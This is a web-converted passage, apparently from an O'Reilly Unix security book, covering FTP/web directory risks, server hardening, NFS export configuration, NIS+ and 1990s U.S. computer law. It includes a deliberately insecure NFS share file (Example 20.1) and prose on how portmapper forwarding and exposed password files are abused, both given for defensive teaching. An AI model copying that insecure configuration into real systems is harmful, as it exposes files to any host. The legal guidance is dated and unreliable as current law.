from analyzing the scripts to discover security flaws. This is especially important for scripts that are<br />

written inside your organization, and thus might not be subject to the same degree of certification and<br />

checking as scripts that are written for publication or redistribution.<br />

18.2.4.1 Beware mixing HTTP with anonymous FTP<br />

Many sites use the same directory for storing documents that are accessed through anonymous FTP and the<br />

World Wide Web. For example, you may have a directory called /NetDocs on your server that is both the<br />

home directory of the FTP user and the root directory of your Web server. This would allow files to be referred<br />

to by two URLS, such as http://server.com/nosmis/myfile.html or ftp://server.com/nosmis/myfile.html.<br />

The primary advantage of HTTP over FTP is speed and efficiency. HTTP is optimized for anonymous access<br />

from a stateless server. FTP, on the other hand, had anonymous access added as an afterthought, and requires<br />

that the server maintain a significant amount of state for the client<br />

Mixing HTTP and FTP directories poses a variety of security issues, including:<br />

●<br />

●<br />

●<br />

●<br />

Allowing anonymous FTP access to the HTTP directories gives users a means of bypassing any<br />

restrictions on document access that the Web server may be providing. Thus, if you have confidential<br />

documents stored on your Web server, they may not remain confidential for long with this arrangement.<br />

If an attacker can download your CGI scripts with FTP, he can search them for avenues for attack.<br />

You must be very sure that there is no way for an FTP user to upload a script that will be run on your<br />

server.<br />

The /etc/passwd file present for your FTP service might be visible to someone using the WWW service,<br />

thus leading to a compromise of its contents. If you have included any real passwords in that file, they<br />

will be available to the client for remote password cracking.<br />

18.2.5 Other Issues<br />

There are many other measures that you can take to make your server more secure. For example, you can limit<br />

the use of the computer so that it is solely a Web server. This will make it harder for an attacker to break in to<br />

your server and, if an attacker does, it will limit the amount of damage that he can do to the rest of your<br />

network.<br />

If you do chose to make your server a stand-alone computer, read over Chapter 21, Firewalls, for a list of<br />

techniques that you can use to isolate your computer from your network and make the computer difficult for an<br />

attacker to use. In particular, you may wish to consider the following options:<br />

●<br />

●<br />

●<br />

Delete all unnecessary accounts.<br />

Do not NFS mount or export any directories.<br />

Delete all compilers.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_02.htm (8 of 9) [2002-04-12 10:44:17]


[Chapter 18] 18.2 Running a <strong>Sec</strong>ure Server<br />

●<br />

●<br />

●<br />

Delete all utility programs that are not used during boot or by the Web server.<br />

Provide as few network services as possible.<br />

Do not run a mail server.<br />

Another option, but one that may require a non-trivial amount of work, is to place your WWW server and all<br />

files in a separate directory structure. The WWW server is then wrapped with a small program that does a<br />

chroot ( ) to the directory (see Chapter 22, Wrappers and Proxies). Thus, if some way is found to break out of<br />

the controls you have placed on the server, the regular filesystem is hidden and protected from attack. Some<br />

WWW servers may have this approach included as an install-time option, so check the documentation.<br />

18.1 <strong>Sec</strong>urity and the World<br />

Wide Web<br />

18.3 Controlling Access to<br />

Files on Your Server<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_02.htm (9 of 9) [2002-04-12 10:44:17]


[Chapter 20] 20.2 Server-Side NFS <strong>Sec</strong>urity<br />

Chapter 20<br />

NFS<br />

20.2 Server-Side NFS <strong>Sec</strong>urity<br />

Because NFS allows users on a network to access files stored on the server, NFS has significant security implications<br />

for the server. These implications fall into three broad categories:<br />

Client access<br />

NFS can (and should) be configured so that only certain clients on the network can mount filesystems stored<br />

on the server.<br />

User authentication<br />

NFS can (and should) be configured so that users can only access and alter files to which they have been<br />

granted access.<br />

Eavesdropping and data spoofing<br />

NFS should (but does not) protect information on the network from eavesdropping and surreptitious<br />

modification.<br />

20.2.1 Limiting Client Access: /etc/exports and /etc/dfs/dfstab<br />

The NFS server can be configured so that only certain hosts are allowed to mount filesystems on the server. This is a<br />

very important step in maintaining server security: if an unauthorized host is denied the ability to mount a filesystem,<br />

then the unauthorized users on that host will not be able to access the server's files.<br />

20.2.1.1 /etc/exports<br />

Many versions of <strong>UNIX</strong>, including Sun's SunOS, HP's HP-UX, and SGI's IRIX operating systems use the<br />

/etc/exports file to designate which clients can mount the server's filesystem and what access those clients are to be<br />

given. Each line in the /etc/exports file generally has the form:<br />

directory -options [,more options]<br />

For example, a sample /etc/exports file might look like this:<br />

/ -access=math,root=prose.domain.edu<br />

/usr -ro<br />

/usr/spool/mail -access=math<br />

The directory may be any directory or filesystem on your server. In the example, exported directories are /, /usr, and<br />

/usr/spool/mail.<br />

The options allow you to specify a variety of security-related options for each directory. These include:<br />

access=machinelist<br />

Grants access to this filesystem only to the hosts or netgroups[8] specified in machinelist. The names of hosts<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_02.htm (1 of 5) [2002-04-12 10:44:18]


o<br />

[Chapter 20] 20.2 Server-Side NFS <strong>Sec</strong>urity<br />

and netgroups are listed and separated by colons (e.g., host1:host2:group3). A maximum of ten hosts or group<br />

names can be listed in some older systems (check your documentation).[9]<br />

[8] See the discussion of RPC and netgroups in Chapter 19.<br />

[9] There was an old bug in NFS that caused a filesystem to be exported to the world if an exports<br />

line exceeded 256 characters after name alias expansion. Use showmount -e to verify when<br />

finished.<br />

Exports the directory and its contents as read-only to all clients. This options overrides whatever the file<br />

permission bits are actually set to.<br />

rw=machinelist<br />

Exports the filesystem read-only to all hosts except those listed, which are allowed read/write access to the<br />

filesystem.<br />

root=machinelist<br />

Normally, NFS changes the user ID for requests issued by the superuser on remote machines from 0 (root) to<br />

-2 (nobody.) Specifying a list of hosts gives the superuser on these remote machines superuser access on the<br />

server.<br />

anon=uid<br />

Specifies what user ID to use on NFS requests that are not accompanied by a user ID, such as might happen<br />

from a DOS client. The number specified is used for both the UID and the GID of anonymous requests. A<br />

value of -2 is the nobody user. A value of -1 usually disallows access.<br />

secure<br />

Specifies that NFS should use Sun's <strong>Sec</strong>ure RPC (AUTH_DES) authentication system, instead of<br />

AUTH_<strong>UNIX</strong>. (See Chapter 19, RPC, NIS, NIS+, and Kerberos) for more information.<br />

You should understand that NFS maintains options on a per-filesystem basis, not per-directory, basis. If you put two<br />

directories in the /etc/exports file that actually reside on the same filesystem, they will use the same options (usually<br />

the options used in the last export listed).<br />

Sun's documentation of anon states that, "If a request comes from an unknown user, use the given UID as the<br />

effective user ID." This statement is very misleading; in fact, NFS by default honors "unknown" user IDs - that is,<br />

UIDS that are not in the server's /etc/passwd file - in the same way that it honors "known" UIDS, because the NFS<br />

server does not ever read the contents of the /etc/passwd file. The anon option actually specifies which UID to use<br />

for NFS requests that are not accompanied by authentication credentials.<br />

Let's look at the example /etc/exports file again:<br />

/ -access=math,root=prose.domain.edu<br />

/usr -ro<br />

/usr/spool/mail -access=math<br />

This example allows anybody in the group math or on the machine math to mount the root directory of the server,<br />

but only the root user on machine prose.domain.edu has superuser access to these files. The /usr filesystem is<br />

exported read-only to every machine that can get RPC packets to and from this server (usually a bad idea - this may<br />

be a wider audience than the local network). And the /usr/spool/mail directory is exported to any host in the math<br />

netgroup.<br />

20.2.1.2 /usr/etc/exportfs<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_02.htm (2 of 5) [2002-04-12 10:44:18]


[Chapter 20] 20.2 Server-Side NFS <strong>Sec</strong>urity<br />

The /usr/etc/exportfs program reads the /etc/exports file and configures the NFS server, which runs inside the<br />

kernel's address space. After you make a change to /etc/exports, be sure to type this on the server:<br />

# exportfs -a<br />

You can also use the exportfs command to temporarily change the options on a filesystem. Because different<br />

versions of the command have slightly different syntax, you should consult your documentation.<br />

20.2.1.3 Exporting NFS directories under System V: share and dfstab<br />

Versions of NFS that are present on System V systems (including Solaris 2.x) have dispensed with the /etc/exports<br />

file and have instead adopted a more general mechanism for dealing with many kinds of distributed filesystems in a<br />

uniform manner. These systems use a command called share to extend access for a filesystem to a remote machine,<br />

and the command unshare to revoke access.<br />

The share command has the syntax:<br />

share [ -F FSType ] [ -o specific_options ] [ -d description ] [ pathname]<br />

where FSType should be nfs for NFS filesystems, and specific_options are the same as those documented with the<br />

/etc/exportfs file earlier. The optional argument description is meant to be a human-readable description of the<br />

filesystem that is being shared.<br />

When a system using this mechanism boots, its network initialization scripts execute the shell script /etc/dfs/dfstab.<br />

This file contains a list of share commands. For example:<br />

Example 20.1: An /etc/dfs/dfstab file With Some Problems<br />

# place share(1M) commands here for automatic execution<br />

# on entering init state 3.<br />

#<br />

# This configuration is not secure.<br />

#<br />

share -F nfs -o rw=red:blue:green /cpg<br />

share -F nfs -o rw=clients -d "spool" /var/spool<br />

share -F nfs /tftpboot<br />

share -F nfs -o ro /usr/lib/X11/ncd<br />

share -F nfs -o ro /usr/openwin<br />

This file gives the computers red, blue, and green access to the /cpg filesystem; it also gives all of the computers in<br />

the clients netgroup access to /var/spool. All computers on the network are given read-write access to the /tftpboot<br />

directory; and all computers on the network are given read-only access to the directories /usr/lib/X11/ncd and<br />

/usr/openwin.<br />

Do you see the security hole in the above configuration? It's explained in detail in <strong>Sec</strong>tion 20.4, "Improving NFS<br />

<strong>Sec</strong>urity" later in this chapter.<br />

NOTE: Do not export your filesystems back to your own machine if your RPC portmapper has proxy<br />

forwarding enabled (the default in many vendor versions). You should not export your partitions to the<br />

local host, either by name or to the alias localhost, and you should not export to any netgroups of which<br />

your host is a member. If proxy forwarding is enabled, an attacker can carefully craft NFS packets and<br />

send them to the portmapper, which in turn forwards them to the NFS server. As the packets come from<br />

the portmapper process (which is running as root), they appear to be coming from a trusted system. This<br />

configuration can allow anyone to alter and delete files at will.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_02.htm (3 of 5) [2002-04-12 10:44:18]


20.2.2 The showmount Command<br />

You can use the <strong>UNIX</strong> command /usr/etc/showmount to list all of the clients that have probably mounted directories<br />

from your server. This command has the form:<br />

/usr/etc/showmount [options] [host]<br />

The options are:<br />

-a<br />

-d<br />

-e<br />

[Chapter 20] 20.2 Server-Side NFS <strong>Sec</strong>urity<br />

Lists all of the hosts and which directories they have mounted.<br />

Lists only the directories that have been remotely mounted.<br />

Lists all of the filesystems that are exported; this option is described in more detail later in this chapter.<br />

NOTE: The showmount command does not tell you which hosts are actually using your exported<br />

filesystems; it shows you only the names of the hosts that have mounted your filesystems since the last<br />

reset of the local log file. Because of the design of NFS, you can use a filesystem without first mounting<br />

it.<br />

NFS Exports Under Linux<br />

The Linux NFS server offers a sophisticated set of options that can be placed in the /etc/exports file. While these<br />

options seem to increase security, they actually don't.<br />

The options are:<br />

secure<br />

This option requires that incoming NFS requests come from an IP port less than 1024, one of the "secure"<br />

ports. This requirement prevents an attacker from sending requests directly to your NFS server unless the<br />

attacker has obtained superuser access. (Of course, if the attacker has obtained root access, this option does<br />

not help.) This option is equivalent to NFS port monitoring under other versions of <strong>UNIX</strong> (e.g., nfs_portmon<br />

under SunOS).<br />

root_squash<br />

Forces requests from UID 0 to be mapped to the anonymous UID. Unfortunately, this option does not protect<br />

other UIDS.<br />

no_root_squash<br />

Turns off root squashing. Even less secure.<br />

squash_uids=0-10,20,25-30<br />

Allows you to specify other UIDS that are mapped to the anonymous UID. Of course, an attacker can still gain<br />

access to your system by using non-squashed UIDs.<br />

all_squash<br />

Specifies that all UIDS should be mapped to the anonymous UID. This option does genuinely increase your<br />

system's security, but why not simply export your filesystem read-only?<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_02.htm (4 of 5) [2002-04-12 10:44:18]


[Chapter 20] 20.2 Server-Side NFS <strong>Sec</strong>urity<br />

20.1 Understanding NFS 20.3 Client-Side NFS <strong>Sec</strong>urity<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_02.htm (5 of 5) [2002-04-12 10:44:18]


[Chapter 19] 19.5 Sun's NIS+<br />

19.5 Sun's NIS+<br />

Chapter 19<br />

RPC, NIS, NIS+, and Kerberos<br />

NIS was designed for a small, friendly computing environment. As Sun Microsystem's customers began<br />

to build networks with thousands or tens of thousands of workstations, NIS started to show its<br />

weaknesses:<br />

●<br />

●<br />

●<br />

●<br />

NIS maps could only be updated by logging onto the server and editing files.<br />

NIS servers could only be updated in a single batch operation. Updates could take many minutes,<br />

or even hours, to complete.<br />

All information transmitted by NIS was transmitted without encryption, making it subject to<br />

eavesdropping.<br />

NIS updates themselves were authenticated with AUTH_<strong>UNIX</strong> RPC authentication, making them<br />

subject to spoofing.<br />

To respond to these complaints, Sun Microsystems started working on an NIS replacement in 1990. That<br />

system was eventually released a few years later as NIS+.<br />

NIS+ quickly earned a bad reputation. By all accounts, the early releases were virtually untested and<br />

rarely operated as promised. Sun Microsystems sent engineers into the field to debug their software at<br />

customer sites. Eventually, Sun worked the bugs out of NIS+ and today it is a more reliable system for<br />

secure network management and control.<br />

An excellent reference for people using NIS+ is Rick Ramsey's book, All About Administrating NIS+<br />

(SunSoft Press, Prentice Hall, 1994).<br />

19.5.1 What NIS+ Does<br />

NIS+ creates network databases that are used to store information about computers and users within an<br />

organization. NIS+ calls these databases tables; they are functionally similar to NIS maps. Unlike NIS,<br />

NIS+ allows for incremental updates of the information stored on replicated database servers throughout<br />

the network.<br />

Each NIS+ domain has one and only one NIS+ root domain server. This is a computer that contains the<br />

master copy of the information stored in the NIS+root domain. The information stored on this server can<br />

be replicated, allowing the network to remain usable even when the root server is down or unavailable.<br />

There may also be NIS+ servers for subdomains.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_05.htm (1 of 7) [2002-04-12 10:44:19]


[Chapter 19] 19.5 Sun's NIS+<br />

Entities that communicate using NIS+ are called NIS+ principals. An NIS+ principle may be a host or an<br />

authenticated user. Each NIS+ principal has a public key and a secret key, which are stored on an NIS+<br />

server in the domain. (As this is <strong>Sec</strong>ure RPC, the secret key is stored encrypted.)<br />

All communication between NIS+ servers and NIS+ principals take place through <strong>Sec</strong>ure RPC. This<br />

makes the communication resistant to both eavesdropping and spoofing attacks. NIS+ also oversees the<br />

creation and management of <strong>Sec</strong>ure RPC keys; by virtue of using NIS+, every member of the<br />

organization is enabled to use <strong>Sec</strong>ure RPC.<br />

19.5.2 NIS+ Objects<br />

All information stored on an NIS+ server is stored in the form of objects. NIS+ supports three<br />

fundamental kinds of objects:<br />

Table objects<br />

Store configuration information.<br />

Group objects<br />

Used for NIS+ authorization, NIS+ groups give you a way to collectively refer to a set of NIS+<br />

principals (users or machines) at a single time.<br />

Directories<br />

Provide structure to an NIS+ server. Directories can store tables, groups, or other directories,<br />

creating a tree structure on the NIS+ server similar to the <strong>UNIX</strong> filesystem.<br />

19.5.3 NIS+ Tables<br />

Information stored in NIS+ tables can be retrieved using any table column as a key; NIS+ thus eliminates<br />

the need under NIS to have multiple NIS maps (such as group.bygid and group.byname). NIS+<br />

predefines 16 tables (see Table 19.2); users are free to create additional tables of their own.<br />

Table 19.2: NIS+ Predefined Tables<br />

Table Equivalent <strong>UNIX</strong> File Stores<br />

Hosts /etc/hosts IP address and hostname of every<br />

workstation in the NIS+ domain.<br />

Bootparams /etc/bootparams Configuration information for diskless<br />

clients, including location of root, swap and<br />

dump partitions.<br />

Passwd /etc/passwd User account information (password, full<br />

name, home directory, etc.)<br />

Cred <strong>Sec</strong>ure RPC credentials for users in the<br />

domain.<br />

Group /etc/group Groupnames, passwords, and members of<br />

every <strong>UNIX</strong> group.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_05.htm (2 of 7) [2002-04-12 10:44:19]


[Chapter 19] 19.5 Sun's NIS+<br />

Netgroup /etc/netgroup Netgroups to which workstations and users<br />

belong.<br />

Mail_Aliases /usr/lib/aliases /etc/aliases /etc/mail/aliases Electronic mail aliases.<br />

Timezone /etc/timezone The time zone of each workstation in the<br />

domain.<br />

Networks /etc/networks The networks in the domain and their<br />

canonical names.<br />

Netmasks /etc/inet/netmasks /etc/netmasks The name of each network in the domain and<br />

its associated netmask.<br />

Ethers /etc/ethers The Ethernet address of every workstation in<br />

the domain.<br />

Services /etc/services The port number for every <strong>Internet</strong> service<br />

used in the domain.<br />

Protocols /etc/protocols The IP protocols used in the domain.<br />

RPC The RPC program numbers for RPC servers<br />

in the domain.<br />

Outcome None The location of home directories for users in<br />

the domain.<br />

Auto_Mounter None Information for Sun's Automounter.<br />

19.5.4 Using NIS+<br />

For users, using an NIS+ domain can be remarkably pleasant. When a user logs in to a workstation, the<br />

/bin/login command automatically acquires the user's NIS+ security credentials and attempts to decrypt<br />

them with the user's login password.<br />

If the account password and the NIS+ credentials password are the same (and they usually are), the NIS+<br />

keyserv process will cache the user's secret key and the user will have transparent access to all <strong>Sec</strong>ure<br />

RPC services. If the account password and the NIS+ credentials password are not the same, then the user<br />

will need to manually log in to the NIS+ domain by using the keylogin command.<br />

NIS+ users should change their passwords with the NIS+ nispasswd command, which works in much the<br />

same way as the standard <strong>UNIX</strong> passwd command.<br />

NIS+ security is implemented by providing a means for authenticating users, and by establishing access<br />

control lists that control the ways that those authenticated users can interact with the information stored<br />

in NIS+ tables. NIS+ provides for two authentication types:<br />

LOCAL<br />

DES<br />

Authentication based on the UID of the <strong>UNIX</strong> process executing the NIS+ command. LOCAL<br />

authentication is used largely for administrating the root NIS+ server.<br />

Authentication based on <strong>Sec</strong>ure RPC. Users must have their public key and encrypted secret key<br />

stored in the NIS+ Cred table to use DES authentication.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_05.htm (3 of 7) [2002-04-12 10:44:19]


[Chapter 19] 19.5 Sun's NIS+<br />

Like <strong>UNIX</strong> files, each NIS+ object has an owner, which is usually the object's creator. (An object's<br />

owner can be changed with the nischown command.) NIS+ objects also have access control lists, which<br />

are used to control which principals have what kind of access to the object.<br />

NIS+ allows four kinds of access to objects:<br />

Read Ability to read the contents of the object.<br />

Modify Ability to modify the contents of the object.<br />

Create Ability to create new objects within the table.<br />

Destroy Ability to destroy objects contained within the table.<br />

NIS+ maintains a list of these access rights for four different kinds of principals:<br />

Nobody Unauthenticated requests, such as requests from individuals who do not have NIS+ credentials<br />

within this NIS+ domain.<br />

Owner The principal that created the object (or that was assigned ownership via the nischown<br />

command).<br />

Group Other principals in the object's group.<br />

World Other principals within the object's NIS+ domain.<br />

The way that NIS+ commands display access rights similar to the way that the <strong>UNIX</strong> ls command<br />

displays file permissions. The key difference is that NIS+ access rights are displayed as a list of 16<br />

characters, and the first four characters represent the rights for "nobody," rather than "owner," as shown<br />

in Figure 19.2.<br />

Figure 19.2: NIS+ access rights are displayed as a list of 16 characters<br />

NIS+ tables may provide additional access privileges for individual rows, columns or entries that they<br />

contain. Thus, all authenticated users may have read access to an entire table, but each user may further<br />

have the ability to modify the row of the table associated with the user's own account. Note that while<br />

individual rows, columns or entries can broaden the access control list, they cannot impose more<br />

restrictive rules.<br />

19.5.4.1 Changing your password<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_05.htm (4 of 7) [2002-04-12 10:44:19]


[Chapter 19] 19.5 Sun's NIS+<br />

Once a user has her NIS+ account set up, she should use the nispasswd command to change the<br />

password:<br />

% nispasswd<br />

Changing password for simsong on NIS+ server.<br />

Old login password: fj39=3-f<br />

New login password: fj43fadf<br />

Re-enter new password:<br />

NIS+ password information changed for simsong<br />

NIS+ credential information changed for simsong<br />

%<br />

19.5.4.2 When a user's passwords don't match<br />

If a user has a different password stored on their workstation and on the <strong>Sec</strong>ure RPC server, he will see<br />

the following message when he logs in:<br />

login: simsong<br />

Password: fj39=3-f<br />

Password does not decrypt secret key for unix.237@cpg.com.<br />

Last login: Sun Nov 19 18:03:42 from sun.vineyard.net<br />

Sun Microsystems Inc. SunOS 5.4 Generic July 1994<br />

%<br />

In this case, the user has a problem because the password that the user knows and uses to log in, for some<br />

reason, does not match the password that was used to encrypt the password on the <strong>Sec</strong>ure RPC server.<br />

The user can't change his password with the nispasswd program, because he doesn't know his NIS<br />

password:<br />

% nispasswd<br />

Changing password for simsong on NIS+ server.<br />

Old login password:<br />

Sorry.<br />

%<br />

Likewise, the superuser can't run the nispasswd program for the user. The only solution is for the system<br />

administrator to become superuser and give the user a new key:<br />

# newkey -u simsong<br />

Updating nisplus publickey database.<br />

Adding new key for unix.237@cpg.com.<br />

Enter simsong's login password: fj39=3-f<br />

#<br />

This procedure sets the user's <strong>Sec</strong>ure RPC password to be the same as their login password. Note that<br />

you must know the user's login password. If you don't, you'll get this error:<br />

# newkey -u simsong<br />

Updating nisplus publickey database.<br />

Adding new key for unix.237@cpg.com.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_05.htm (5 of 7) [2002-04-12 10:44:19]


[Chapter 19] 19.5 Sun's NIS+<br />

Enter simsong's login password: nosmis<br />

newkey: ERROR, password differs from login password.<br />

#<br />

After the user has a new key, he can then use the nispasswd command to change his password, as shown<br />

above.<br />

19.5.5 NIS+ Limitations<br />

If properly configured, NIS+ can be a very secure system for network management and authentication.<br />

However, like all security systems, it is possible to make a mistake in the configuration or management<br />

of NIS+ that would render a network that it protects somewhat less than absolutely secure.<br />

Here are some things to be aware of:<br />

●<br />

●<br />

●<br />

●<br />

Do not run NIS+ in NIS compatibility mode. NIS+ has an NIS compatibility mode that allows<br />

the NIS+ server to interoperate with NIS clients. If you run NIS+ in this mode, then any NIS<br />

server on your network (and possibly other networks as well) will have the ability to access any<br />

piece of information stored within your NIS+ server. Typically, NIS access is used by attackers to<br />

obtain a copy of your domain's encrypted password file, which is then used to probe for<br />

weaknesses.<br />

Manually inspect the permissions of your NIS+ objects on a regular basis. System integrity<br />

checking software such as COPS and Tripwire does not exist (yet) for NIS+. In its absence, you<br />

must manually inspect the NIS+ tables, directories and groups on a regular basis. Be on the<br />

lookout for objects that can be modified by Nobody or by World; also be on the lookout for tables<br />

in which new objects can be created by these principal classes.<br />

<strong>Sec</strong>ure the computers on which your NIS+ servers are running. Your NIS+ server is only as<br />

secure as the computer on which it is running. If attackers can obtain root access on your NIS+<br />

server, they can make any change that they wish to your NIS+ domain, including creating new<br />

users, changing user passwords, and even changing your NIS+ server's master password.<br />

NIS+ servers operate at one of three security levels, described in Table 19.3. Make sure that your<br />

server is operating at level 2, which is the default level.<br />

Table 19.3: NIS+ Server <strong>Sec</strong>urity Levels<br />

<strong>Sec</strong>urity Level Description<br />

0 NIS+ server runs with all security options turned off. Any NIS+ principal may make any<br />

change to any NIS+ object. This level is designed for testing and initially setting up the<br />

NIS+ namespace. <strong>Sec</strong>urity level 0 should not be present in a shipping product (but for<br />

some reason it is.) Do not use security level 0.<br />

1 NIS+ server runs with security turned on, but with DES authentication turned off. That<br />

is, the server will respond to any request in which LOCAL or DES authentication is<br />

specified, opening it up to a wide variety of attacks. <strong>Sec</strong>urity level 1 is designed for<br />

testing and debugging; like security level 0, it should not be present in a shipping<br />

"security" product. Do not use it.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_05.htm (6 of 7) [2002-04-12 10:44:19]


[Chapter 19] 19.5 Sun's NIS+<br />

2 NIS+ server runs with full security authentication and access checking enabled. Only run<br />

NIS+ servers at security level 2.<br />

19.4 Sun's Network<br />

Information Service (NIS)<br />

19.6 Kerberos<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_05.htm (7 of 7) [2002-04-12 10:44:19]


[Chapter 26] 26.4 Other Liability<br />

26.4 Other Liability<br />

Chapter 26<br />

Computer <strong>Sec</strong>urity and U.S. Law<br />

When you operate a computer, you have more to fear than break-ins and physical disasters. You also<br />

need to worry that the actions of some of your own users (or yourself) may result in violation of the law,<br />

or civil action. Here, we present a few notable concerns in this area.<br />

The law is changing rapidly in the areas of computer use and abuse. It is also changing rapidly with<br />

regard to networks and network communication. We cannot hope to provide information here that will be<br />

up-to-date for very long. For instance, one outstanding reference in this area, <strong>Internet</strong> & Network Law<br />

1995, by William J. Cook[5] summarizes some of the recent rulings in computer and network law in the<br />

year 1995. Mr. Cook's report has almost 70 pages of case summaries and incidents, all of which represent<br />

recent decisions. As more people use computers and networks, and as more commercial interests are tied<br />

into computing, we can expect the pace of new legislation, legal decisions, and other actions to increase.<br />

Therefore, as with any other aspect of the law, you are advised to seek competent legal counsel if you<br />

have any questions about whether these concerns may apply to you.[6] Keep in mind that the law<br />

functions with a logic all its own - one that is puzzling and confounding to people who work with<br />

software. The law is not necessarily logical and fair, nor does it always embody common sense.<br />

[5] Of the law firm Willian Brinks Hofer Gilson & Lione in Chicago.<br />

[6] And don't make it a one-time visit, either. With the rapid pace of change, you need to<br />

track the changes if there is any chance that you might be affected by adverse changes in the<br />

law.<br />

26.4.1 Munitions Export<br />

In <strong>Sec</strong>tion 6.7.2, "Cryptography and Export Controls", we described some of the export control<br />

regulations in effect in the United States. Although largely quite silly and short-sighted, they are<br />

nonetheless the law and you may encounter problems if you are in violation.<br />

One reading of the regulations suggests that anyone who exports encryption software outside the country,<br />

or makes it available to foreign nationals who are not permanent residents, is in violation of the statutes<br />

unless a license is obtained first; such licenses are notoriously difficult to obtain. It may also be the case<br />

that granting access to certain forms of advanced supercomputing equipment (even granting accounts) to<br />

foreign nationals is in violation of the law.<br />

You may believe that you are not exporting any prohibited software. However, stop and think for a<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_04.htm (1 of 7) [2002-04-12 10:44:19]


[Chapter 26] 26.4 Other Liability<br />

moment. Does your anonymous FTP repository contain encryption software of any kind? Does your<br />

WWW server have any pages with encryption software? Do you run a mailing list or remailer that can be<br />

used to send encryption software outside the U.S.? If the answer to any of those is "yes," you should<br />

consider seeking legal advice on this issue as you may be classified as an "exporter." Violation of the<br />

export control acts are punishable (upon conviction) with hefty fines and long jail terms.<br />

A further potential violation involves access to the software by non-citizens. If any of your employees (or<br />

students) are not U.S. citizens or permanent residents, and if they have access to encryption software or<br />

advanced computing hardware, you are likely to be in violation of the law. Note that one interpretation of<br />

the law implies that if you only provide an account that is used by someone else to obtain controlled<br />

software you may still be liable. (If you do, you are probably in good company, because nearly all major<br />

universities and software vendors in the country are in the same position. This fact may be little comfort<br />

if Federal agents show up at your door, however.)<br />

An even more bizarre and interesting aspect of the law indicates that you may be in violation of the<br />

export control laws if you provide encryption software to U.S. citizens living and working in the U.S. -<br />

provided that they are working for a company under non-U.S. control. Thus, even if you are a U.S.<br />

citizen, and you download a copy of PGP or DES to your workstation in your office (in Washington,<br />

Chicago, Atlanta, Houston, Phoenix, Portland, Los Angeles, Fairbanks, or Honolulu), you are now an<br />

international arms exporter and potential criminal if your company is majority owned or controlled by<br />

parties outside the U.S. This liability is personal, not corporate.<br />

The whole matter of export controls on encryption software is under study by various government<br />

groups, and is the subject of several lawsuits in Federal court. The status of this situation will<br />

undoubtedly change in the next few years. We hope that it will change to something more reasonable, but<br />

you should be sure to stay informed.<br />

26.4.2 Copyright Infringement<br />

Items other than software can be copyrighted. Images in your WWW pages, sound clips played through<br />

your gopher and WWW servers, and documents you copied from other sites to pad your own collection<br />

all have copyrights associated with them. On-line databases, computer programs, and electronic mail are<br />

copyrighted as well. The law states that as soon as something is expressed in a tangible form, it has a<br />

copyright associated with it. Thus, as soon as the bits are on your disk, they are copyrighted, whether a<br />

formal notice exists or not.<br />

The standard practice on the <strong>Internet</strong> has been that something exported with a public-access server is for<br />

public use, unless otherwise noted. However, this practice is not in keeping with the way the law is<br />

currently phrased. Furthermore, some items that you obtain from an intermediate party may have had<br />

owner and copyright information removed. This does not absolve you of any copyright liability if you<br />

use that material.<br />

In particular, recent rulings in various courts have found that under certain circumstances system<br />

operators can be sued as a contributing party, and thus held partially liable, for copyright infringement<br />

committed by users of their systems. Types of infringement include:<br />

●<br />

Posting pictures, artwork, and images on FTP sites and WWW sites without appropriate<br />

permission, even if the items are not clearly identified regarding owner, subject, or copyright.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_04.htm (2 of 7) [2002-04-12 10:44:19]


[Chapter 26] 26.4 Other Liability<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Posting excerpts from books, reports, and other copyrighted materials via mail, FTP, or Usenet<br />

postings.<br />

Posting sound clips from films, TV shows, or other recorded media without approval of the<br />

copyright holders.<br />

Posting scanned-in cartoons from newspapers or magazines.<br />

Reposting news articles from copyrighted sources.<br />

Reposting of email. Like paper mail, email has a copyright held by the author of the email as soon<br />

as it is put in tangible form. The act of sending the mail to someone does not give the recipient<br />

copyright interest in the email. Standard practice on the net is not in keeping with the way the law<br />

is written. Thus, forwarding email may technically be a violation of the copyright law.<br />

The best defense against possible lawsuits is to carefully screen everything you post or make available to<br />

be certain you know its copyright status. Furthermore, make all your users aware of the policy you set in<br />

this regard, and then periodically audit to ensure that the policy is followed. Having an unenforced policy<br />

will likely serve you as well as no policy - that is, not at all.<br />

Also, beware of "amateur lawyers" who tell you that reuse of an image or article is "fair use" under the<br />

law. There is a very precise definition of fair use, and you should get the opinion from a real lawyer who<br />

knows the issues. After all, if you get sued, do you think that a reference to an anonymous post in the<br />

alt.erotica.lawyers.briefs Usenet newsgroup is going to convince the judge that you took due diligence to<br />

adhere to the law?<br />

If anyone notifies you that you are violating their copyright with something you have on your system,<br />

you should investigate immediately. Any delay could cause additional problems. (However, we are not<br />

necessarily advocating that you pull your material from the network any time you get a complaint.)<br />

